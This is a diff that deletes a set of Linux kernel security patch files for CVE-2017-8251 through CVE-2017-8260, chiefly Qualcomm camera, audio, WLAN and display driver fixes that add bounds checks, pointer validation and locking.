diff --git a/Patches/Linux_CVEs/CVE-2017-8251/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8251/3.10/0001.patch
deleted file mode 100644
index 8a334400..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8251/3.10/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 3a42f1b79ed696f29350f170c00f27712ae84a36 Mon Sep 17 00:00:00 2001
-From: Maggie White
-Date: Wed, 5 Jul 2017 13:00:40 -0700
-Subject: msm: camera: isp: fix for out of bound access array
-
-There is no bound check in stream_cfg_cmd->num_streams and it's used in
-several places as a maximum index into the stream_cfg_cmd->stream_handle
-array which has a size of 15. Current code didn't check the maximum
-index to make sure it didn't exceed the array size.
-
-Bug: 62379525
-Change-Id: Idcf639486d235551882dafc34d9e798d78c70bf0
-Signed-off-by: Maggie White
----
- .../platform/msm/camera_v2/isp/msm_isp_stats_util.c | 19 +++++++++++++++++++
- 1 file changed, 19 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index 82da3e0..43a2c77 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -550,6 +550,12 @@ static int msm_isp_stats_update_cgc_override(struct vfe_device *vfe_dev,
- int i;
- uint32_t stats_mask = 0, idx;
-
-+ if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+ pr_err("%s invalid num_streams %d\n", __func__,
-+ stream_cfg_cmd->num_streams);
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
-
-@@ -630,6 +636,13 @@ static int msm_isp_start_stats_stream(struct vfe_device *vfe_dev,
- stats_data->stream_info);
- if (rc < 0)
- return rc;
-+
-+ if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+ pr_err("%s invalid num_streams %d\n", __func__,
-+ stream_cfg_cmd->num_streams);
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
-
-@@ -702,6 +715,12 @@ static int msm_isp_stop_stats_stream(struct vfe_device *vfe_dev,
- num_stats_comp_mask =
- vfe_dev->hw_info->stats_hw_info->num_stats_comp_mask;
-
-+ if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+ pr_err("%s invalid num_streams %d\n", __func__,
-+ stream_cfg_cmd->num_streams);
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-
- idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8251/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8251/4.4/0002.patch
deleted file mode 100644
index 8b96d464..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8251/4.4/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 771254edea3486535453dbb76d090cd6bcf92af9 Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal
-Date: Sat, 4 Mar 2017 12:05:44 +0530
-Subject: msm: camera: isp: fix for out of bound access array
-
-There is no bound check in stream_cfg_cmd->num_streams,
-in functions msm_isp_check_stream_cfg_cmd and
-msm_isp_stats_update_cgc_override num_streams is used as
-the index for stream_cfg_cmd->stream_handle array which
-has a size of 15. Current code did not check the num_streams
-to make sure that did not exceed the array size
-
-CRs-Fixed: 2006015
-
-Change-Id: I7f195c764a4e6c12e4f7c680bc3c9aa7b078e625
-Signed-off-by: Senthil Kumar Rajagopal
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 11 +++++++++++
- 1 file changed, 11 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index f40af6e..b38226a 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -832,6 +832,12 @@ static int msm_isp_stats_update_cgc_override(struct vfe_device *vfe_dev,
- struct msm_vfe_stats_stream *stream_info;
- int k;
-
-+ if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+ pr_err("%s invalid num_streams %d\n", __func__,
-+ stream_cfg_cmd->num_streams);
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
-
-@@ -961,6 +967,11 @@ static int msm_isp_check_stream_cfg_cmd(struct vfe_device *vfe_dev,
- int vfe_idx;
- uint32_t stats_idx[MSM_ISP_STATS_MAX];
-
-+ if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+ pr_err("%s invalid num_streams %d\n", __func__,
-+ stream_cfg_cmd->num_streams);
-+ return -EINVAL;
-+ }
- memset(stats_idx, 0, sizeof(stats_idx));
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8253/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8253/ANY/0001.patch
deleted file mode 100644
index f13ac465..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8253/ANY/0001.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From a5f07894058c4198f61e533d727b343c5be879b0 Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula
-Date: Tue, 15 Nov 2016 12:26:47 -0800
-Subject: msm: camera: sensor: Add boundary check for cci master
-
-Add boundary check for cci master in i2c_read.
-This value is passed from userpsace. If user sends an
-invalid number for master there is a possibility of
-accessing unintended buffer.
-
-This change addresses the issue.
-
-Crs-Fixed: 1086764
-Signed-off-by: Rajesh Bondugula
-Change-Id: Ice3bde902aea96382ceb4dfddfd28a5ea89c183d
----
- .../media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 18 +++++++++++++-----
- 1 file changed, 13 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index b1c2382..2412ed2 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -776,10 +776,18 @@ static int32_t msm_cci_i2c_read(struct v4l2_subdev *sd,
- enum cci_i2c_queue_t queue = QUEUE_1;
- struct cci_device *cci_dev = NULL;
- struct msm_camera_cci_i2c_read_cfg *read_cfg = NULL;
-+
- CDBG("%s line %d\n", __func__, __LINE__);
- cci_dev = v4l2_get_subdevdata(sd);
- master = c_ctrl->cci_info->cci_i2c_master;
- read_cfg = &c_ctrl->cfg.cci_i2c_read_cfg;
-+
-+ if (master >= MASTER_MAX || master < 0) {
-+ pr_err("%s:%d Invalid I2C master %d\n",
-+ __func__, __LINE__, master);
-+ return -EINVAL;
-+ }
-+
- mutex_lock(&cci_dev->cci_master_info[master].mutex_q[queue]);
-
- /* Set the I2C Frequency */
-@@ -1004,11 +1012,6 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- enum cci_i2c_master_t master;
-
- cci_dev = v4l2_get_subdevdata(sd);
-- if (c_ctrl->cci_info->cci_i2c_master >= MASTER_MAX
-- || c_ctrl->cci_info->cci_i2c_master < 0) {
-- pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
-- return -EINVAL;
-- }
- if (cci_dev->cci_state != CCI_STATE_ENABLED) {
- pr_err("%s invalid cci state %d\n",
- __func__, cci_dev->cci_state);
-@@ -1539,6 +1542,11 @@ static int32_t msm_cci_write(struct v4l2_subdev *sd,
- return rc;
- }
-
-+ if (c_ctrl->cci_info->cci_i2c_master >= MASTER_MAX
-+ || c_ctrl->cci_info->cci_i2c_master < 0) {
-+ pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
-+ return -EINVAL;
-+ }
- master = c_ctrl->cci_info->cci_i2c_master;
- cci_master_info = &cci_dev->cci_master_info[master];
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch
deleted file mode 100644
index 24e650c5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 338a5cecf0f839331f0a58bff8aaae79e134799e Mon Sep 17 00:00:00 2001
-From: Fred Oh
-Date: Tue, 07 Apr 2015 19:22:29 -0700
-Subject: [PATCH] ASoC: msm: qdsp6v2: validate audio client in callback
-
-In case of single stream multiple device(SSMD) use-case audio session is
-freed on first EOS. There are some chance to crash when 2nd EOS event is
-reached with some delay. This make sure return properly if audio client
-is not valid.
-
-Bug: 36252027
-Change-Id: I3711d8e039fc37e654ca5230f3dc8784c6dba071
-Signed-off-by: Fred Oh
-Signed-off-by: Siqi Lin
----
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index b17a440..4f486b1 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -329,6 +329,16 @@
- return -ENOMEM;
- }
-
-+static bool q6asm_is_valid_audio_client(struct audio_client *ac)
-+{
-+ int n;
-+ for (n = 1; n <= SESSION_MAX; n++) {
-+ if (session[n] == ac)
-+ return 1;
-+ }
-+ return 0;
-+}
-+
- static void q6asm_session_free(struct audio_client *ac)
- {
- pr_debug("%s: sessionid[%d]\n", __func__, ac->session);
-@@ -905,7 +915,8 @@
- pr_err("ac or priv NULL\n");
- return -EINVAL;
- }
-- if (ac->session <= 0 || ac->session > 8) {
-+ if (ac->session <= 0 || ac->session > 8 ||
-+ !q6asm_is_valid_audio_client(ac)) {
- pr_err("%s:Session ID is invalid, session = %d\n", __func__,
- ac->session);
- return -EINVAL;
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch.base64
deleted file mode 100644
index ab8dbc81..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch
deleted file mode 100644
index 81d9a798..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From fd6890b6c55c2ced15b7165cc658eb83dafc7eb1 Mon Sep 17 00:00:00 2001
-From: Aravind Kumar
-Date: Mon, 11 May 2015 15:26:27 +0530
-Subject: [PATCH] ASoC: msm: qdsp6v2: check audio client pointer before accessing
-
-In the registered callback for q6asm, we are checking if
-the audio client pointer is valid and also, dereferencing it
-to get the session ID even though it could be invalid or expired.
-Return and exit immediately if the audio client pointer is
-invalid.
-
-Bug: 36252027
-CRs-Fixed: 832914
-Change-Id: I96b722b584a4b5adf8a33891abd75a320e76ea25
-Signed-off-by: Aravind Kumar
-Signed-off-by: Siqi Lin
----
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 4f486b1..20e2cef 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -915,8 +915,13 @@
- pr_err("ac or priv NULL\n");
- return -EINVAL;
- }
-- if (ac->session <= 0 || ac->session > 8 ||
-- !q6asm_is_valid_audio_client(ac)) {
-+ if (!q6asm_is_valid_audio_client(ac)) {
-+ pr_err("%s: audio client pointer is invalid, ac = %p\n",
-+ __func__, ac);
-+ return -EINVAL;
-+ }
-+
-+ if (ac->session <= 0 || ac->session > 8) {
- pr_err("%s:Session ID is invalid, session = %d\n", __func__,
- ac->session);
- return -EINVAL;
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch.base64
deleted file mode 100644
index eaed2539..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-8254/ANY/0003.patch
deleted file mode 100644
index 9e7246e8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/ANY/0003.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 70afce1d9be745005c48fd565c01ce452a565e7e Mon Sep 17 00:00:00 2001
-From: Aravind Kumar
-Date: Mon, 11 May 2015 15:26:27 +0530
-Subject: ASoC: msm: qdsp6v2: check audio client pointer before accessing
-
-In the registered callback for q6asm, we are checking if
-the audio client pointer is valid and also, dereferencing it
-to get the session ID even though it could be invalid or expired.
-Return and exit immediately if the audio client pointer is
-invalid.
-
-CRs-Fixed: 832914
-Change-Id: I96b722b584a4b5adf8a33891abd75a320e76ea25
-Signed-off-by: Aravind Kumar
----
- sound/soc/msm/qdsp6v2/q6asm.c | 9 +++++++--
- 1 file changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 9a1e0e7..f6a5cb0 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -1451,8 +1451,13 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv)
- pr_err("%s: data NULL\n", __func__);
- return -EINVAL;
- }
-- if (ac->session <= 0 || ac->session > 8 ||
-- !q6asm_is_valid_audio_client(ac)) {
-+ if (!q6asm_is_valid_audio_client(ac)) {
-+ pr_err("%s: audio client pointer is invalid, ac = %p\n",
-+ __func__, ac);
-+ return -EINVAL;
-+ }
-+
-+ if (ac->session <= 0 || ac->session > 8) {
- pr_err("%s: Session ID is invalid, session = %d\n", __func__,
- ac->session);
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8256/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-8256/qcacld-2.0/0001.patch
deleted file mode 100644
index 4a4f5b64..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8256/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 75e1e00d6b3cd4cb89fd5314a60c333aa0b03230 Mon Sep 17 00:00:00 2001
-From: Manjeet Singh
-Date: Thu, 22 Dec 2016 18:17:17 +0530
-Subject: qcacld-2.0: Add bounday check for multicastAddr array
-
-In hdd_set_rx_filter API multicastAddr array being accessed beyond
-its size.
-
-Add boundary check for multicastAddr.
-
-CRs-Fixed: 1104565
-Change-Id: I8e1543a8f42ac40c04d2c6a17e69718d13cbd706
----
- CORE/HDD/src/wlan_hdd_main.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index 4020488..fab1eac 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -4722,6 +4722,8 @@ static int hdd_set_rx_filter(hdd_adapter_t *adapter, bool action,
- MAC_ADDR_ARRAY(filter->multicastAddr[j]));
- j++;
- }
-+ if (j == SIR_MAX_NUM_MULTICAST_ADDRESS)
-+ break;
- }
- filter->ulMulticastAddrCnt = j;
- /* Set rx filter */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8257/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8257/ANY/0001.patch
deleted file mode 100644
index d8298314..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8257/ANY/0001.patch
+++ /dev/null
@@ -1,182 +0,0 @@
-From 0f19fbd00c6679bbc524f7a6d0fc3d54cfd1c9ae Mon Sep 17 00:00:00 2001
-From: Benjamin Chan
-Date: Fri, 17 Feb 2017 14:49:45 -0500
-Subject: msm: sde: Add mutex lock for debug buffer access in rotator
-
-Adding mutex lock access protection to debug buffer for SDE rotator. The
-buffer can be shared between multiple processes, and it is possible that
-one process try to free the buffer while another process is still
-accessing it.
-
-CRs-Fixed: 2003129
-Change-Id: Ib20767f02ba7f14fb972d5c50ab264b2309a1ec2
-Signed-off-by: Benjamin Chan
----
- .../platform/msm/sde/rotator/sde_rotator_debug.c | 39 +++++++++++++++++++---
- .../platform/msm/sde/rotator/sde_rotator_debug.h | 3 +-
- 2 files changed, 36 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c
-index a2da663..f41382b 100644
---- a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c
-+++ b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c
-@@ -990,11 +990,14 @@ static int sde_rotator_debug_base_release(struct inode *inode,
- {
- struct sde_rotator_debug_base *dbg = file->private_data;
-
-- if (dbg && dbg->buf) {
-+ if (dbg) {
-+ mutex_lock(&dbg->buflock);
- kfree(dbg->buf);
- dbg->buf_len = 0;
- dbg->buf = NULL;
-+ mutex_unlock(&dbg->buflock);
- }
-+
- return 0;
- }
-
-@@ -1026,8 +1029,10 @@ static ssize_t sde_rotator_debug_base_offset_write(struct file *file,
- if (cnt > (dbg->max_offset - off))
- cnt = dbg->max_offset - off;
-
-+ mutex_lock(&dbg->buflock);
- dbg->off = off;
- dbg->cnt = cnt;
-+ mutex_unlock(&dbg->buflock);
-
- SDEROT_DBG("offset=%x cnt=%x\n", off, cnt);
-
-@@ -1047,7 +1052,10 @@ static ssize_t sde_rotator_debug_base_offset_read(struct file *file,
- if (*ppos)
- return 0; /* the end */
-
-+ mutex_lock(&dbg->buflock);
- len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt);
-+ mutex_unlock(&dbg->buflock);
-+
- if (len < 0 || len >=
sizeof(buf))
- return 0;
-
-@@ -1086,6 +1094,8 @@ static ssize_t sde_rotator_debug_base_reg_write(struct file *file,
- if (off >= dbg->max_offset)
- return -EFAULT;
-
-+ mutex_lock(&dbg->buflock);
-+
- /* Enable Clock for register access */
- sde_rotator_clk_ctrl(dbg->mgr, true);
-
-@@ -1094,6 +1104,8 @@ static ssize_t sde_rotator_debug_base_reg_write(struct file *file,
- /* Disable Clock after register access */
- sde_rotator_clk_ctrl(dbg->mgr, false);
-
-+ mutex_unlock(&dbg->buflock);
-+
- SDEROT_DBG("addr=%zx data=%x\n", off, data);
-
- return count;
-@@ -1104,12 +1116,14 @@ static ssize_t sde_rotator_debug_base_reg_read(struct file *file,
- {
- struct sde_rotator_debug_base *dbg = file->private_data;
- size_t len;
-+ int rc = 0;
-
- if (!dbg) {
- SDEROT_ERR("invalid handle\n");
- return -ENODEV;
- }
-
-+ mutex_lock(&dbg->buflock);
- if (!dbg->buf) {
- char dump_buf[64];
- char *ptr;
-@@ -1121,7 +1135,8 @@ static ssize_t sde_rotator_debug_base_reg_read(struct file *file,
-
- if (!dbg->buf) {
- SDEROT_ERR("not enough memory to hold reg dump\n");
-- return -ENOMEM;
-+ rc = -ENOMEM;
-+ goto debug_read_error;
- }
-
- ptr = dbg->base + dbg->off;
-@@ -1151,18 +1166,26 @@ static ssize_t sde_rotator_debug_base_reg_read(struct file *file,
- dbg->buf_len = tot;
- }
-
-- if (*ppos >= dbg->buf_len)
-- return 0; /* done reading */
-+ if (*ppos >= dbg->buf_len) {
-+ rc = 0; /* done reading */
-+ goto debug_read_error;
-+ }
-
- len = min(count, dbg->buf_len - (size_t) *ppos);
- if (copy_to_user(user_buf, dbg->buf + *ppos, len)) {
- SDEROT_ERR("failed to copy to user\n");
-- return -EFAULT;
-+ rc = -EFAULT;
-+ goto debug_read_error;
- }
-
- *ppos += len; /* increase offset */
-
-+ mutex_unlock(&dbg->buflock);
- return len;
-+
-+debug_read_error:
-+ mutex_unlock(&dbg->buflock);
-+ return rc;
- }
-
- static const struct file_operations sde_rotator_off_fops = {
-@@ -1196,6 +1219,9 @@ int sde_rotator_debug_register_base(struct sde_rotator_device *rot_dev,
- if (!dbg)
- return
-ENOMEM;
-
-+ mutex_init(&dbg->buflock);
-+ mutex_lock(&dbg->buflock);
-+
- if (name)
- strlcpy(dbg->name, name, sizeof(dbg->name));
- dbg->base = io_data->base;
-@@ -1217,6 +1243,7 @@ int sde_rotator_debug_register_base(struct sde_rotator_device *rot_dev,
- dbg->base += rot_dev->mdata->regdump ?
- rot_dev->mdata->regdump[0].offset : 0;
- }
-+ mutex_unlock(&dbg->buflock);
-
- strlcpy(dbgname + prefix_len, "off", sizeof(dbgname) - prefix_len);
- ent_off = debugfs_create_file(dbgname, 0644, debugfs_root, dbg,
-@@ -1234,7 +1261,9 @@ int sde_rotator_debug_register_base(struct sde_rotator_device *rot_dev,
- goto reg_fail;
- }
-
-+ mutex_lock(&dbg->buflock);
- dbg->mgr = rot_dev->mgr;
-+ mutex_unlock(&dbg->buflock);
-
- return 0;
- reg_fail:
-diff --git a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h
-index c2c6f97..c6d0151 100644
---- a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h
-+++ b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -53,6 +53,7 @@ struct sde_rotator_debug_base {
- char *buf;
- size_t buf_len;
- struct sde_rot_mgr *mgr;
-+ struct mutex buflock;
- };
-
- #if defined(CONFIG_DEBUG_FS)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8258/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8258/ANY/0001.patch
deleted file mode 100644
index ad4c1a65..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8258/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 31e2a2f0f2f3615cefd4400c707709bbc3e26170 Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal
-Date: Wed, 15 Feb 2017 15:08:09 +0530
-Subject: msm: isp: fix for potentitial array out of bound access
-
-There is no bound check on dual_hw_ms_cmd->num_src,
-which is coming from userspace
-num_src is used as the index for the input_src array
-which has a size of 5.
-The current code did not check the num_src to make sure
-that it never exceeds the input_src array size.
-
-CRs-Fixed: 2006169
-Change-Id: If5927e06e70cce4afb0ae9f2cdfec80f76f83771
-Signed-off-by: Senthil Kumar Rajagopal
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index d8227e7..b2b39e0 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -618,6 +618,11 @@ static int msm_isp_set_dual_HW_master_slave_mode(
- }
- ISP_DBG("%s: vfe %d num_src %d\n", __func__, vfe_dev->pdev->id,
- dual_hw_ms_cmd->num_src);
-+ if (dual_hw_ms_cmd->num_src > VFE_SRC_MAX) {
-+ pr_err("%s: Error! Invalid num_src %d\n", __func__,
-+ dual_hw_ms_cmd->num_src);
-+ return -EINVAL;
-+ }
- /* This for loop is for non-primary intf to be marked with Master/Slave
- * in order for frame id sync. But their timestamp is not saved.
- * So no sof_info resource is allocated */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8259/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8259/ANY/0001.patch
deleted file mode 100644
index 0e034318..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8259/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 68020103af00280393da10039b968c95d68e526c Mon Sep 17 00:00:00 2001
-From: Puja Gupta
-Date: Mon, 6 Mar 2017 15:04:11 -0800
-Subject: soc: qcom: Avoid possible buffer overflow in service-locator
-
-Fix possible buffer overflow by reading 'resp->total_domains' from the
-qmi response message since 'resp->total_domains' indicate total number
-of matching domains found by servreg.
-'resp->domain_list_len' indicates the domains that could be sent in one
-response which should not be greater than 'resp->total_domains'.
-
-CRs-Fixed: 2009016
-Change-Id: I614561c5f9bc996689129bc098baaffc9b59c377
-Signed-off-by: Puja Gupta
----
- drivers/soc/qcom/service-locator.c | 11 +++++++----
- 1 file changed, 7 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/soc/qcom/service-locator.c b/drivers/soc/qcom/service-locator.c
-index 8581ed5..0d6c1d6 100644
---- a/drivers/soc/qcom/service-locator.c
-+++ b/drivers/soc/qcom/service-locator.c
-@@ -266,10 +266,9 @@ static int service_locator_send_msg(struct pd_qmi_client_data *pd)
- if (!domains_read) {
- db_rev_count = pd->db_rev_count = resp->db_rev_count;
- pd->total_domains = resp->total_domains;
-- if (!pd->total_domains && resp->domain_list_len) {
-- pr_err("total domains not set\n");
-- pd->total_domains = resp->domain_list_len;
-- }
-+ if (!resp->total_domains)
-+ pr_info("No matching domains found\n");
-+
- pd->domain_list = kmalloc(
- sizeof(struct servreg_loc_entry_v01) *
- resp->total_domains, GFP_KERNEL);
-@@ -286,6 +285,10 @@ static int service_locator_send_msg(struct pd_qmi_client_data *pd)
- rc = -EAGAIN;
- goto out;
- }
-+ if (resp->domain_list_len > resp->total_domains) {
-+ /* Always read total_domains from the response msg */
-+ resp->domain_list_len = resp->total_domains;
-+ }
- /* Copy the response*/
- store_get_domain_list_response(pd, resp, domains_read);
- domains_read += resp->domain_list_len;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8260/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8260/3.10/0001.patch
deleted file mode 100644
index 4dcd6ac3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8260/3.10/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 52a2a62a5b0e9dd917bcd9a6d86d674833cc91b7 Mon Sep 17 00:00:00 2001
-From: Gaoxiang Chen
-Date: Fri, 31 Mar 2017 14:28:33 +0800
-Subject: msm: camera: don't cut to 8bits for validating enum variable
-
-In msm_ispif_is_intf_valid(),
-we convert a enum variable msm_ispif_vfe_intf,
-to uint8_t type for validating.
-
-This could cause potential issue,
-if the value is crafted in such a way that lower 8bits pass the validation.
-
-Don't use uint8_t as input parm to avoid such vulnerability.
-
-CRs-Fixed: 2008469
-Change-Id: I4ee400ac0edd830decfbe5712966d968976a268a
-Signed-off-by: Gaoxiang Chen
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 12 ++++++------
- 1 file changed, 6 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 4e07d4d..8409a64 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -64,7 +64,7 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
-
-
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
-- uint8_t intf_type)
-+ enum msm_ispif_vfe_intf intf_type)
- {
- return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
- (intf_type >= VFE_MAX)) ?
false : true;
-@@ -347,7 +347,7 @@ static int msm_ispif_subdev_g_chip_ident(struct v4l2_subdev *sd,
- }
-
- static void msm_ispif_sel_csid_core(struct ispif_device *ispif,
-- uint8_t intftype, uint8_t csid, uint8_t vfe_intf)
-+ uint8_t intftype, uint8_t csid, enum msm_ispif_vfe_intf vfe_intf)
- {
- uint32_t data;
-
-@@ -387,7 +387,7 @@ static void msm_ispif_sel_csid_core(struct ispif_device *ispif,
- }
-
- static void msm_ispif_enable_crop(struct ispif_device *ispif,
-- uint8_t intftype, uint8_t vfe_intf, uint16_t start_pixel,
-+ uint8_t intftype, enum msm_ispif_vfe_intf vfe_intf, uint16_t start_pixel,
- uint16_t end_pixel)
- {
- uint32_t data;
-@@ -419,7 +419,7 @@ static void msm_ispif_enable_crop(struct ispif_device *ispif,
- }
-
- static void msm_ispif_enable_intf_cids(struct ispif_device *ispif,
-- uint8_t intftype, uint16_t cid_mask, uint8_t vfe_intf, uint8_t enable)
-+ uint8_t intftype, uint16_t cid_mask, enum msm_ispif_vfe_intf vfe_intf, uint8_t enable)
- {
- uint32_t intf_addr, data;
-
-@@ -461,7 +461,7 @@ static void msm_ispif_enable_intf_cids(struct ispif_device *ispif,
- }
-
- static int msm_ispif_validate_intf_status(struct ispif_device *ispif,
-- uint8_t intftype, uint8_t vfe_intf)
